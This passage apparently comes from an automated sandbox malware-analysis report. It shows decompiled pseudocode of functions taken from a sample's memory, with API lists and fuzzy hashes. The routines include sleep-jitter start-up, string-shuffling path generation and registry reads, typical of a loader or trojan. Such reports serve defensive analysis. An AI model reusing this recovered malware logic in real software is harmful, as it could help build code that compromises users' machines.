                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                          • String ID:
                                                          • API String ID: 2118684380-0
                                                          • Opcode ID: be758eb13ae308ab21d6d4f6971ddc6fe488f9812877b24f96b925e9cebde8e9
                                                          • Instruction ID: dce8943ed96c2d04faa4a209642153fd9bd5e9bbe6d4166a4f855bc4adda45ef
                                                          • Opcode Fuzzy Hash: be758eb13ae308ab21d6d4f6971ddc6fe488f9812877b24f96b925e9cebde8e9
                                                          • Instruction Fuzzy Hash: 4C513C75500609AFDF11CFA9C884ADAB7BAFF88744B14846AE905DB320DB35ED46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E044712E5(void* __ecx, void* __edx, intOrPtr _a4) {
                                                          				struct _FILETIME _v12;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				int _t14;
                                                          				signed int _t16;
                                                          				void* _t18;
                                                          				signed int _t19;
                                                          				unsigned int _t23;
                                                          				void* _t26;
                                                          				signed int _t33;
                                                          
                                                          				_t26 = __edx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                          				 *0x447d238 = _t10;
                                                          				if(_t10 != 0) {
                                                          					 *0x447d1a8 = GetTickCount();
                                                          					_t12 = E04473E69(_a4);
                                                          					if(_t12 == 0) {
                                                          						do {
                                                          							GetSystemTimeAsFileTime( &_v12);
                                                          							_t14 = SwitchToThread();
                                                          							_t23 = _v12.dwHighDateTime;
                                                          							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                          							_push(0);
                                                          							_push(9);
                                                          							_push(_t23 >> 7);
                                                          							_push(_t16);
                                                          							L0447B08A();
                                                          							_t33 = _t14 + _t16;
                                                          							_t18 = E04475548(_a4, _t33);
                                                          							_t19 = 2;
                                                          							_t25 = _t33;
                                                          							Sleep(_t19 << _t33); // executed
                                                          						} while (_t18 == 1);
                                                          						if(E04474DA2(_t25) != 0) {
                                                          							 *0x447d260 = 1; // executed
                                                          						}
                                                          						_t12 = E04475BA2(_t26); // executed
                                                          					}
                                                          				} else {
                                                          					_t12 = 8;
                                                          				}
                                                          				return _t12;
                                                          			}














                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04474EF2,?), ref: 044712F8
                                                          • GetTickCount.KERNEL32 ref: 0447130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04474EF2,?), ref: 04471328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04474EF2,?), ref: 0447132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 0447134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04474EF2,?), ref: 04471365
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 78386e1411ef2c8ec999c1ff6c3ba76670b1e454441b8b8c0787ce60df2ad479
                                                          • Instruction ID: 9344c4abd3be8f9dab77e1290deef2973236bebc733af487a92b57a0918c5cbc
                                                          • Opcode Fuzzy Hash: 78386e1411ef2c8ec999c1ff6c3ba76670b1e454441b8b8c0787ce60df2ad479
                                                          • Instruction Fuzzy Hash: 2011CCB1A54301BFFB206BA5DC49BAA7798EB44355F00451AF985D67C0EE74FC0386A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 57%
                                                          			E04475BA2(signed int __edx) {
                                                          				signed int _v8;
                                                          				long _v12;
                                                          				CHAR* _v16;
                                                          				long _v20;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t21;
                                                          				CHAR* _t22;
                                                          				CHAR* _t25;
                                                          				intOrPtr _t26;
                                                          				void* _t27;
                                                          				void* _t31;
                                                          				void* _t32;
                                                          				CHAR* _t36;
                                                          				CHAR* _t43;
                                                          				CHAR* _t44;
                                                          				void* _t49;
                                                          				void* _t51;
                                                          				CHAR* _t54;
                                                          				signed char _t56;
                                                          				intOrPtr _t58;
                                                          				signed int _t59;
                                                          				void* _t62;
                                                          				CHAR* _t65;
                                                          				CHAR* _t66;
                                                          				char* _t67;
                                                          				void* _t68;
                                                          
                                                          				_t61 = __edx;
                                                          				_v20 = 0;
                                                          				_v8 = 0;
                                                          				_v12 = 0;
                                                          				_t21 = E04476C09();
                                                          				if(_t21 != 0) {
                                                          					_t59 =  *0x447d25c; // 0x4000000a
                                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                                          					 *0x447d25c = (_t59 & 0xf0000000) + _t21;
                                                          				}
                                                          				_t22 =  *0x447d160(0, 2); // executed
                                                          				_v16 = _t22;
                                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                          					_t25 = E0447496B( &_v8,  &_v20); // executed
                                                          					_t54 = _t25;
                                                          					_t26 =  *0x447d2a8; // 0xb9a5a8
                                                          					if( *0x447d25c > 5) {
                                                          						_t8 = _t26 + 0x447e5cd; // 0x4d283a53
                                                          						_t27 = _t8;
                                                          					} else {
                                                          						_t7 = _t26 + 0x447e9f5; // 0x44283a44
                                                          						_t27 = _t7;
                                                          					}
                                                          					E0447729A(_t27, _t27);
                                                          					_t31 = E0447232F(_t61,  &_v20,  &_v12); // executed
                                                          					if(_t31 == 0) {
                                                          						CloseHandle(_v20);
                                                          					}
                                                          					_t62 = 5;
                                                          					if(_t54 != _t62) {
                                                          						 *0x447d270 =  *0x447d270 ^ 0x81bbe65d;
                                                          						_t32 = E0447A71F(0x60);
                                                          						 *0x447d32c = _t32;
                                                          						__eflags = _t32;
                                                          						if(_t32 == 0) {
                                                          							_push(8);
                                                          							_pop(0);
                                                          						} else {
                                                          							memset(_t32, 0, 0x60);
                                                          							_t49 =  *0x447d32c; // 0x50195b0
                                                          							_t68 = _t68 + 0xc;
                                                          							__imp__(_t49 + 0x40);
                                                          							_t51 =  *0x447d32c; // 0x50195b0
                                                          							 *_t51 = 0x447e81a;
                                                          						}
                                                          						_t54 = 0;
                                                          						__eflags = 0;
                                                          						if(0 == 0) {
                                                          							_t36 = RtlAllocateHeap( *0x447d238, 0, 0x43);
                                                          							 *0x447d2c8 = _t36;
                                                          							__eflags = _t36;
                                                          							if(_t36 == 0) {
                                                          								_push(8);
                                                          								_pop(0);
                                                          							} else {
                                                          								_t56 =  *0x447d25c; // 0x4000000a
                                                          								_t61 = _t56 & 0x000000ff;
                                                          								_t58 =  *0x447d2a8; // 0xb9a5a8
                                                          								_t13 = _t58 + 0x447e55a; // 0x697a6f4d
                                                          								_t55 = _t13;
                                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x447c287);
                                                          							}
                                                          							_t54 = 0;
                                                          							__eflags = 0;
                                                          							if(0 == 0) {
                                                          								asm("sbb eax, eax");
                                                          								E04479135( ~_v8 &  *0x447d270,  &E0447D00C); // executed
                                                          								_t54 = E0447888E(_t55);
                                                          								__eflags = _t54;
                                                          								if(_t54 != 0) {
                                                          									goto L30;
                                                          								}
                                                          								_t43 = E044787AE(); // executed
                                                          								__eflags = _t43;
                                                          								if(_t43 != 0) {
                                                          									__eflags = _v8;
                                                          									_t65 = _v12;
                                                          									if(_v8 != 0) {
                                                          										L29:
                                                          										_t44 = E044751B0(_t61, _t65, _v8); // executed
                                                          										_t54 = _t44;
                                                          										goto L30;
                                                          									}
                                                          									__eflags = _t65;
                                                          									if(__eflags == 0) {
                                                          										goto L30;
                                                          									}
                                                          									_t54 = E04471C66(__eflags,  &(_t65[4]));
                                                          									__eflags = _t54;
                                                          									if(_t54 == 0) {
                                                          										goto L30;
                                                          									}
                                                          									goto L29;
                                                          								}
                                                          								_t54 = 8;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t66 = _v12;
                                                          						if(_t66 == 0) {
                                                          							L30:
                                                          							if(_v16 == 0 || _v16 == 1) {
                                                          								 *0x447d15c();
                                                          							}
                                                          							goto L34;
                                                          						}
                                                          						_t67 =  &(_t66[4]);
                                                          						do {
                                                          						} while (E0447A273(_t62, _t67, 0, 1) == 0x4c7);
                                                          					}
                                                          					goto L30;
                                                          				} else {
                                                          					_t54 = _t22;
                                                          					L34:
                                                          					return _t54;
                                                          				}
                                                          			}































                                                          APIs
                                                            • Part of subcall function 04476C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,04475BBB,00000000,00000000), ref: 04476C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04475C38
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • memset.NTDLL ref: 04475C87
                                                          • RtlInitializeCriticalSection.NTDLL(05019570), ref: 04475C98
                                                            • Part of subcall function 04471C66: memset.NTDLL ref: 04471C7B
                                                            • Part of subcall function 04471C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04471CBD
                                                            • Part of subcall function 04471C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04471CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04475CC3
                                                          • wsprintfA.USER32 ref: 04475CF3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: e08877226bfc199699d6e213dbd4c5db1fd2e6f96e79646764c83d334cd101b6
                                                          • Instruction ID: 1222e8d431c16d7b09fdbb17de1cff0d8c40a5e5df25cd8a6c2f4540fa09fab1
                                                          • Opcode Fuzzy Hash: e08877226bfc199699d6e213dbd4c5db1fd2e6f96e79646764c83d334cd101b6
                                                          • Instruction Fuzzy Hash: 0351A4B1E10218BBFF21ABA5D848BDF77A8EB04744F148457E601EB641E678B9478B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 22%
                                                          			E044762DA(signed int __eax, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr _v16;
                                                          				signed int _v20;
                                                          				intOrPtr _t81;
                                                          				char _t83;
                                                          				signed int _t90;
                                                          				signed int _t97;
                                                          				signed int _t99;
                                                          				char _t101;
                                                          				unsigned int _t102;
                                                          				intOrPtr _t103;
                                                          				char* _t107;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				signed int _t118;
                                                          				signed int _t122;
                                                          				intOrPtr _t124;
                                                          
                                                          				_t102 = _a8;
                                                          				_t118 = 0;
                                                          				_v20 = __eax;
                                                          				_t122 = (_t102 >> 2) + 1;
                                                          				_v8 = 0;
                                                          				_a8 = 0;
                                                          				_t81 = E0447A71F(_t122 << 2);
                                                          				_v16 = _t81;
                                                          				if(_t81 == 0) {
                                                          					_push(8);
                                                          					_pop(0);
                                                          					L37:
                                                          					return 0;
                                                          				}
                                                          				_t107 = _a4;
                                                          				_a4 = _t102;
                                                          				_t113 = 0;
                                                          				while(1) {
                                                          					_t83 =  *_t107;
                                                          					if(_t83 == 0) {
                                                          						break;
                                                          					}
                                                          					if(_t83 == 0xd || _t83 == 0xa) {
                                                          						if(_t118 != 0) {
                                                          							if(_t118 > _v8) {
                                                          								_v8 = _t118;
                                                          							}
                                                          							_a8 = _a8 + 1;
                                                          							_t118 = 0;
                                                          						}
                                                          						 *_t107 = 0;
                                                          						goto L16;
                                                          					} else {
                                                          						if(_t118 != 0) {
                                                          							L10:
                                                          							_t118 = _t118 + 1;
                                                          							L16:
                                                          							_t107 = _t107 + 1;
                                                          							_t15 =  &_a4;
                                                          							 *_t15 = _a4 - 1;
                                                          							if( *_t15 != 0) {
                                                          								continue;
                                                          							}
                                                          							break;
                                                          						}
                                                          						if(_t113 == _t122) {
                                                          							L21:
                                                          							if(_a8 <= 0x20) {
                                                          								_push(0xb);
                                                          								L34:
                                                          								_pop(0);
                                                          								L35:
                                                          								E0447A734(_v16);
                                                          								goto L37;
                                                          							}
                                                          							_t24 = _v8 + 5; // 0xcdd8d2f8
                                                          							_t103 = E0447A71F((_v8 + _t24) * _a8 + 4);
                                                          							if(_t103 == 0) {
                                                          								_push(8);
                                                          								goto L34;
                                                          							}
                                                          							_t90 = _a8;
                                                          							_a4 = _a4 & 0x00000000;
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_t124 = _t103 + _t90 * 4;
                                                          							if(_t90 <= 0) {
                                                          								L31:
                                                          								 *0x447d278 = _t103;
                                                          								goto L35;
                                                          							}
                                                          							do {
                                                          								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                          								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                          								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                          								_v12 = _v12 & 0x00000000;
                                                          								if(_a4 <= 0) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t99 = _v12;
                                                          									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                                                          									if(_t99 == 0) {
                                                          										break;
                                                          									}
                                                          									_v12 = _v12 + 1;
                                                          									if(_v12 < _a4) {
                                                          										continue;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_v8 = _v8 - 1;
                                                          								L30:
                                                          								_t97 = _a4;
                                                          								_a4 = _a4 + 1;
                                                          								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                          								__imp__(_t124);
                                                          								_v8 = _v8 + 1;
                                                          								_t124 = _t124 + _t97 + 1;
                                                          							} while (_v8 < _a8);
                                                          							goto L31;
                                                          						}
                                                          						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                          						_t101 = _t83;
                                                          						if(_t83 - 0x61 <= 0x19) {
                                                          							_t101 = _t101 - 0x20;
                                                          						}
                                                          						 *_t107 = _t101;
                                                          						_t113 = _t113 + 1;
                                                          						goto L10;
                                                          					}
                                                          				}
                                                          				if(_t118 != 0) {
                                                          					if(_t118 > _v8) {
                                                          						_v8 = _t118;
                                                          					}
                                                          					_a8 = _a8 + 1;
                                                          				}
                                                          				goto L21;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0447A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04475595), ref: 0447A72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 044763D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 044763EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04476403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 04476427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 0b88685388253bcb34e5d20eea65da3842f55fcd9638bb2b421d734f272ecc4f
                                                          • Instruction ID: f5181c24548ac0bec99012f3b42713f44b24da14d92921fe672175e9e4e2eef1
                                                          • Opcode Fuzzy Hash: 0b88685388253bcb34e5d20eea65da3842f55fcd9638bb2b421d734f272ecc4f
                                                          • Instruction Fuzzy Hash: 41518171A00518EBDF25CF99C4856EEBBB7FF45324F16805BE915AB201CB70AA53CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E04476545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                          				intOrPtr _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				intOrPtr _t26;
                                                          				intOrPtr* _t28;
                                                          				intOrPtr _t31;
                                                          				intOrPtr* _t32;
                                                          				void* _t39;
                                                          				int _t46;
                                                          				intOrPtr* _t47;
                                                          				int _t48;
                                                          
                                                          				_t47 = __eax;
                                                          				_push( &_v12);
                                                          				_push(__eax);
                                                          				_t39 = 0;
                                                          				_t46 = 0; // executed
                                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                          				_v8 = _t26;
                                                          				if(_t26 < 0) {
                                                          					L13:
                                                          					return _v8;
                                                          				}
                                                          				if(_v12 == 0) {
                                                          					Sleep(0xc8);
                                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                          				}
                                                          				if(_v8 >= _t39) {
                                                          					_t28 = _v12;
                                                          					if(_t28 != 0) {
                                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                          						_v8 = _t31;
                                                          						if(_t31 >= 0) {
                                                          							_t46 = lstrlenW(_v16);
                                                          							if(_t46 != 0) {
                                                          								_t46 = _t46 + 1;
                                                          								_t48 = _t46 + _t46;
                                                          								_t39 = E0447A71F(_t48);
                                                          								if(_t39 == 0) {
                                                          									_v8 = 0x8007000e;
                                                          								} else {
                                                          									memcpy(_t39, _v16, _t48);
                                                          								}
                                                          								__imp__#6(_v16);
                                                          							}
                                                          						}
                                                          						_t32 = _v12;
                                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                          					}
                                                          					 *_a4 = _t39;
                                                          					 *_a8 = _t46 + _t46;
                                                          				}
                                                          				goto L13;
                                                          			}

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 1b57a743befc1eae88b0b0b673bc80c5088d88c61e983bb45c7e93e0fe830b05
                                                          • Instruction ID: 2f30fa8c1de2ce90c82c09410ab9294ccf5d43f0c57c62ca12cad7e2ab50a913
                                                          • Opcode Fuzzy Hash: 1b57a743befc1eae88b0b0b673bc80c5088d88c61e983bb45c7e93e0fe830b05
                                                          • Instruction Fuzzy Hash: 35217175900609EFDF11DFA8D9849DEBBB5FF48314B1141AAE902E7304EB30EA06DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04478D14(void* __edx) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				WCHAR* _v16;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t23;
                                                          				intOrPtr _t24;
                                                          				intOrPtr _t32;
                                                          				intOrPtr _t35;
                                                          				intOrPtr _t38;
                                                          				void* _t40;
                                                          				intOrPtr _t42;
                                                          				void* _t45;
                                                          				void* _t50;
                                                          				void* _t52;
                                                          
                                                          				_t50 = __edx;
                                                          				_v12 = 0;
                                                          				_t23 = E0447A2F9(0,  &_v8); // executed
                                                          				if(_t23 != 0) {
                                                          					_v8 = 0;
                                                          				}
                                                          				_t24 =  *0x447d2a8; // 0xb9a5a8
                                                          				_t4 = _t24 + 0x447edc0; // 0x5019368
                                                          				_t5 = _t24 + 0x447ed68; // 0x4f0053
                                                          				_t45 = E04475356( &_v16, _v8, _t5, _t4);
                                                          				if(_t45 == 0) {
                                                          					StrToIntExW(_v16, 0,  &_v12);
                                                          					_t45 = 8;
                                                          					if(_v12 < _t45) {
                                                          						_t45 = 1;
                                                          						__eflags = 1;
                                                          					} else {
                                                          						_t32 =  *0x447d2a8; // 0xb9a5a8
                                                          						_t11 = _t32 + 0x447edb4; // 0x501935c
                                                          						_t48 = _t11;
                                                          						_t12 = _t32 + 0x447ed68; // 0x4f0053
                                                          						_t52 = E044745C6(_t11, _t12, _t11);
                                                          						_t59 = _t52;
                                                          						if(_t52 != 0) {
                                                          							_t35 =  *0x447d2a8; // 0xb9a5a8
                                                          							_t13 = _t35 + 0x447edfe; // 0x30314549
                                                          							if(E04478E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                                          								_t61 =  *0x447d25c - 6;
                                                          								if( *0x447d25c <= 6) {
                                                          									_t42 =  *0x447d2a8; // 0xb9a5a8
                                                          									_t15 = _t42 + 0x447ec0a; // 0x52384549
                                                          									E04478E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                          								}
                                                          							}
                                                          							_t38 =  *0x447d2a8; // 0xb9a5a8
                                                          							_t17 = _t38 + 0x447edf8; // 0x50193a0
                                                          							_t18 = _t38 + 0x447edd0; // 0x680043
                                                          							_t40 = E04475D7D(_v8, 0x80000001, _t52, _t18, _t17); // executed
                                                          							_t45 = _t40;
                                                          							HeapFree( *0x447d238, 0, _t52);
                                                          						}
                                                          					}
                                                          					HeapFree( *0x447d238, 0, _v16);
                                                          				}
                                                          				_t54 = _v8;
                                                          				if(_v8 != 0) {
                                                          					E04474F14(_t54);
                                                          				}
                                                          				return _t45;
                                                          			}



















                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05019368,00000000,?,74B5F710,00000000,74B5F730), ref: 04478D63
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050193A0,?,00000000,30314549,00000014,004F0053,0501935C), ref: 04478E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0447523E), ref: 04478E12
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 4ea4c79c912e3e9fd8988b661dfbcf4337a278d318a5b7ffc723eeb71d124b9c
                                                          • Instruction ID: 6cfd0f9cfb4565142552e0e2856dcd97f0986af62150ebc96c91fd36f84bc12b
                                                          • Opcode Fuzzy Hash: 4ea4c79c912e3e9fd8988b661dfbcf4337a278d318a5b7ffc723eeb71d124b9c
                                                          • Instruction Fuzzy Hash: 8031A171900109BFFF20EB90DD48DDABBBDEF44704F1441AAA600AB121E770AE47CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E0447A376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				void* _v8;
                                                          				void* __edi;
                                                          				intOrPtr _t18;
                                                          				void* _t24;
                                                          				void* _t25;
                                                          				void* _t30;
                                                          				void* _t36;
                                                          				void* _t40;
                                                          				intOrPtr _t42;
                                                          
                                                          				_t36 = __edx;
                                                          				_t32 = __ecx;
                                                          				_push(__ecx);
                                                          				_push(__ecx);
                                                          				_t42 =  *0x447d340; // 0x5019a88
                                                          				_push(0x800);
                                                          				_push(0);
                                                          				_push( *0x447d238);
                                                          				if( *0x447d24c >= 5) {
                                                          					if(RtlAllocateHeap() == 0) {
                                                          						L6:
                                                          						_t30 = 8;
                                                          						L7:
                                                          						if(_t30 != 0) {
                                                          							L10:
                                                          							 *0x447d24c =  *0x447d24c + 1;
                                                          							L11:
                                                          							return _t30;
                                                          						}
                                                          						_t44 = _a4;
                                                          						_t40 = _v8;
                                                          						 *_a16 = _a4;
                                                          						 *_a20 = E04477306(_t44, _t40);
                                                          						_t18 = E04474A09(_t40, _t44);
                                                          						if(_t18 != 0) {
                                                          							 *_a8 = _t40;
                                                          							 *_a12 = _t18;
                                                          							if( *0x447d24c < 5) {
                                                          								 *0x447d24c =  *0x447d24c & 0x00000000;
                                                          							}
                                                          							goto L11;
                                                          						}
                                                          						_t30 = 0xbf;
                                                          						E04476761();
                                                          						RtlFreeHeap( *0x447d238, 0, _t40); // executed
                                                          						goto L10;
                                                          					}
                                                          					_t24 = E04471F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                                          					L5:
                                                          					_t30 = _t24;
                                                          					goto L7;
                                                          				}
                                                          				_t25 = RtlAllocateHeap(); // executed
                                                          				if(_t25 == 0) {
                                                          					goto L6;
                                                          				}
                                                          				_t24 = E04474AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
                                                          				goto L5;
                                                          			}













                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0447A39A
                                                            • Part of subcall function 04474AB6: GetTickCount.KERNEL32 ref: 04474ACA
                                                            • Part of subcall function 04474AB6: wsprintfA.USER32 ref: 04474B1A
                                                            • Part of subcall function 04474AB6: wsprintfA.USER32 ref: 04474B37
                                                            • Part of subcall function 04474AB6: wsprintfA.USER32 ref: 04474B63
                                                            • Part of subcall function 04474AB6: HeapFree.KERNEL32(00000000,?), ref: 04474B75
                                                            • Part of subcall function 04474AB6: wsprintfA.USER32 ref: 04474B96
                                                            • Part of subcall function 04474AB6: HeapFree.KERNEL32(00000000,?), ref: 04474BA6
                                                            • Part of subcall function 04474AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04474BD4
                                                            • Part of subcall function 04474AB6: GetTickCount.KERNEL32 ref: 04474BE5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0447A3B8
                                                          • RtlFreeHeap.NTDLL(00000000,00000002,04475289,?,04475289,00000002,?,?,04475D5E,?), ref: 0447A415
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.487601881.0000000004471000.00000020.00000001.sdmp, Offset: 04470000, based on PE: true
                                                          • Associated: 00000004.00000002.487557542.0000000004470000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487638497.000000000447C000.00000002.00000001.sdmp
                                                          • Associated: 00000004.00000002.487659581.000000000447D000.00000004.00000001.sdmp
                                                          • Associated: 00000004.00000002.487679035.000000000447F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                          • String ID:
                                                          • API String ID: 1676223858-0
                                                          • Opcode ID: 08e5b8abf93c8780e325b60bdda3f92abb84d53dcd7b659b1ab0f0e78dbf9240
                                                          • Instruction ID: 77a97f537eb91162e6d4f210b6c7154320832a7b3c47fd0950135135326945d7
                                                          • Opcode Fuzzy Hash: 08e5b8abf93c8780e325b60bdda3f92abb84d53dcd7b659b1ab0f0e78dbf9240
                                                          • Instruction Fuzzy Hash: D2213CB1610214EBEB119F99D884AEE77ACEF44345F104026FA01EB250EB74AD479BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E0447219B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                          				void* _v8;
                                                          				void* __esi;
                                                          				intOrPtr* _t35;
                                                          				intOrPtr* _t41;
                                                          				intOrPtr* _t43;
                                                          				intOrPtr* _t45;
                                                          				intOrPtr* _t50;
                                                          				intOrPtr* _t52;
                                                          				void* _t54;
                                                          				intOrPtr* _t55;
                                                          				intOrPtr* _t57;
                                                          				intOrPtr* _t61;
                                                          				intOrPtr* _t65;
                                                          				intOrPtr _t68;
                                                          				void* _t72;
                                                          				void* _t75;
                                                          				void* _t76;
                                                          
                                                          				_t55 = _a4;
                                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                          				_a4 = 0;
                                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                          				if(_t76 < 0) {
                                                          					L18:
                                                          					return _t76;
                                                          				}
